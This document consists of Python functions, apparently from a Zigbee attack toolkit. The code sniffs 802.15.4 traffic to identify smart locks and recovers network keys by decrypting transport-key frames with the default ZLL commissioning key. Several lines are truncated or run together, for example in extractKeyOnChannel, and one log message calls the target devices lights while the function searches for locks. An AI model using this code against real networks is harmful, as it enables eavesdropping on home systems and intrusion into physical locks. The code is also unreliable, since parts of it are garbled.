def find_locks(radio, panid=None): result = [] trackers = dict() last_sequence_number = dict() if panid is not None: print_notify("Looking at PAN ID 0x%04x for lights" % panid) else: print_notify("Looking for lights on the current channel") print_info("Monitoring the network for an extended period") timer = Timer(17) traffic_counter = 0 while not timer.has_expired(): frame = radio.receive() if frame is not None and not is_beacon_request(frame): traffic_counter += 1 if is_data_request(frame) and (panid is None or get_pan_id(frame) == panid): pan = get_pan_id(frame) source = get_source(frame) if not pan in trackers.keys(): trackers[pan] = dict() last_sequence_number[pan] = dict() if not source in trackers[pan].keys(): trackers[pan][source] = TrackWatch() last_sequence_number[pan][source] = -1 if last_sequence_number[pan][source] != frame[Dot15d4FCS].seqnum: trackers[pan][source].click() last_sequence_number[pan][source] = frame[Dot15d4FCS].seqnum if timer.time_passed() > 5 and traffic_counter == 0: print_info("No traffic observed for 5 seconds, giving up") break for pan in trackers: for addr in trackers[pan]: watch = trackers[pan][addr] if watch.variance() is not None and watch.variance( ) < THRESHOLD_VARIANCE and watch.mean() > MIN_FREQUENCY: result.append((pan, addr)) print_notify("Device 0x%04x on PAN 0x%04x resembles a lock" % (addr, pan)) print_debug( "Device 0x%04x on PAN 0x%04x had variance of %f and mean of %f" % (addr, pan, watch.variance(), watch.mean())) return result
def notify(self, channel, frame): if is_transport_key(frame): if get_extended_source(frame) is not None: extended_source_bytes = extended_address_bytes(get_extended_source(frame)) decrypted, valid = crypto_utils.zigbee_packet_decrypt(crypto_utils.zigbee_trans_key(crypto_utils.DEFAULT_ZLL_COMMISSION_KEY), frame, extended_source_bytes) if valid: print_notify("Network key acquired for PAN 0x%04x" % get_pan_id(frame)) network_key = bytes(decrypted)[2:18] print_info("Extracted key is 0x%s" % network_key.hex())
def wait_for_extended_address(radio, panid, addr): print_info("Waiting to observe the extended source for pan_id:0x%04x, src_addr:0x%04x" % (panid, addr)) timer = Timer(OBSERVATION_TIME) while not timer.has_expired(): frame = radio.receive() if panid==get_pan_id(frame) and addr==get_source(frame): extended_source = get_extended_source(frame) if extended_source is not None: print_notify("Extended source observed: 0x%016x" % extended_source) return extended_source print_error("Could not find extended source") return None
def extractKeyOnChannel(self, channel): print_notify("Listening to channel %d" % while True: frame = if is_transport_key(frame): print_notify("Got transport key packet") if get_extended_source(frame) is not None: print("Got extended source") extended_source_bytes = extended_address_bytes( get_extended_source(frame)) decrypted, valid = crypto_utils.zigbee_packet_decrypt( crypto_utils.DEFAULT_ZLL_COMMISSION_KEY, frame, extended_source_bytes) if valid: print_notify("Network key acquired for PAN 0x%04x" % get_pan_id(frame)) network_key = bytes(decrypted)[2:18] print_info("Extracted key is 0x%s" % network_key.hex())